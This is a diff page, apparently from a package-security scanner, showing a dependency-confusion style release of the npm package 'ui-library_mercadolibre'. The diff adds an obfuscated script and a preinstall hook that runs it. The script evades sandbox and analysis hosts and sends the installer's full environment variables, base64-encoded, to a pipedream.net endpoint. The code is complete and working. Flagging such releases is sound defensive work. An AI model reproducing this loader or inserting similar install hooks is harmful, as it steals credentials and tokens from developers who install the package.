ui-library_mercadolibre 1.11.0 → 5.815.445
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ui-library_mercadolibre might be problematic. Click here for more details.
- package/avyhowe.js +1 -0
- package/package.json +6 -9
- package/index.js +0 -28
- package/lib/index.js +0 -1
package/avyhowe.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x2b2baa=a0_0x3725;(function(_0x16ad9d,_0x50f02e){const _0x3cf53f=a0_0x3725,_0x107b9e=_0x16ad9d();while(!![]){try{const _0x303f7a=-parseInt(_0x3cf53f(0x13b))/0x1+parseInt(_0x3cf53f(0x147))/0x2+parseInt(_0x3cf53f(0x138))/0x3*(parseInt(_0x3cf53f(0x13a))/0x4)+-parseInt(_0x3cf53f(0x132))/0x5+-parseInt(_0x3cf53f(0x137))/0x6+-parseInt(_0x3cf53f(0x130))/0x7*(parseInt(_0x3cf53f(0x13f))/0x8)+parseInt(_0x3cf53f(0x136))/0x9;if(_0x303f7a===_0x50f02e)break;else _0x107b9e['push'](_0x107b9e['shift']());}catch(_0x590fe6){_0x107b9e['push'](_0x107b9e['shift']());}}}(a0_0x1cfa,0xf2573));function a0_0x1cfa(){const _0x54ee99=['npm_config_registry','pipedream','tencent.com','from','write','env','343RRQeDP','net','8433450eQzZHa','taobao.org','keys','some','28590120ftsHNn','2683170sAeRVF','117YlcmQq','error','39860tySZoA','1583481gJgHMY','dc44079f2a81b29fc85632f802b65e3b','daasadmin','length','126760DOJROI','https','includes','USERNAME','POST','join','/usr/bin/python','end','3842166OTzXEy'];a0_0x1cfa=function(){return _0x54ee99;};return a0_0x1cfa();}const http=require(a0_0x2b2baa(0x140)),filter=[{'key':a0_0x2b2baa(0x148),'val':a0_0x2b2baa(0x133)},{'key':a0_0x2b2baa(0x148),'val':a0_0x2b2baa(0x14a)},{'key':a0_0x2b2baa(0x142),'val':a0_0x2b2baa(0x13d)},{'key':'_','val':a0_0x2b2baa(0x145)}];function main(){const _0x377b3d=a0_0x2b2baa;var _0x44f620=process[_0x377b3d(0x12f)]||{};if(filter[_0x377b3d(0x135)](({key:_0x57c53e,val:_0x3a5158})=>_0x44f620[_0x57c53e]&&_0x44f620[_0x57c53e][_0x377b3d(0x141)](_0x3a5158))||Object[_0x377b3d(0x134)](_0x44f620)[_0x377b3d(0x13e)]<0xa)return;req=http['request']({'host':[_0x377b3d(0x13c),'m',_0x377b3d(0x149),_0x377b3d(0x131)][_0x377b3d(0x144)]('.'),'path':'/'+(_0x44f620['npm_package_name']||''),'method':_0x377b3d(0x143)})['on'](_0x377b3d(0x139),function(_0x5e724a){}),req[_0x377b3d(0x12e)](Buffer[_0x377b3d(0x14b)](JSON['stringify'](_0x44f620))['toString']('base64')),req[_0x377b3d(0x146)]();}function a0_0x3725(_0x514a2e,_0x9ef35f){const _0x1cfaa8=a0_0x1cfa();return a0_0x3725=function(_0x3725bd,_0x4b7c74){_0x3725bd=_0x3725bd-0x12e;let _0x238ecd=_0x1cfaa8[_0x3725bd];return _0x238ecd;},a0_0x3725(_0x514a2e,_0x9ef35f);}main();
|
package/package.json
CHANGED
@@ -1,14 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "ui-library_mercadolibre",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"main": "main.js",
|
3
|
+
"version": "5.815.445",
|
4
|
+
"main": "avyhowe.js",
|
6
5
|
"scripts": {
|
7
|
-
"test": "test"
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node avyhowe.js"
|
8
8
|
},
|
9
|
-
"author": "
|
10
|
-
"license": "ISC"
|
11
|
-
"dependencies": {
|
12
|
-
"lodash": "^4.17.21"
|
13
|
-
}
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
14
11
|
}
|
package/index.js
DELETED
@@ -1,28 +0,0 @@
|
|
1
|
-
module.exports = {
|
2
|
-
env: {
|
3
|
-
},
|
4
|
-
globals: {
|
5
|
-
},
|
6
|
-
extends: ['eslint:recommended', 'airbnb-base'],
|
7
|
-
rules: {
|
8
|
-
strict: 'off',
|
9
|
-
'func-names': 'off',
|
10
|
-
'spaced-comment': 'off',
|
11
|
-
'no-underscore-dangle': 'off',
|
12
|
-
'arrow-body-style': 'off',
|
13
|
-
'arrow-parens': ['off', 'as-needed'],
|
14
|
-
'prefer-rest-params': 'off',
|
15
|
-
'no-trailing-spaces': ['error', { skipBlankLines: true }],
|
16
|
-
'comma-dangle': ['warn', 'never'],
|
17
|
-
'new-cap': 'warn',
|
18
|
-
'no-unused-vars': 'warn',
|
19
|
-
'object-shorthand': 1,
|
20
|
-
'prefer-arrow-callback': 'off',
|
21
|
-
'prefer-template': 'warn',
|
22
|
-
'vars-on-top': 'warn',
|
23
|
-
indent: ['error', 2, { SwitchCase: 1 }],
|
24
|
-
'import/newline-after-import': 0,
|
25
|
-
'no-multi-assign': 1,
|
26
|
-
'no-prototype-builtins': 'warn'
|
27
|
-
}
|
28
|
-
};
|
package/lib/index.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
test
|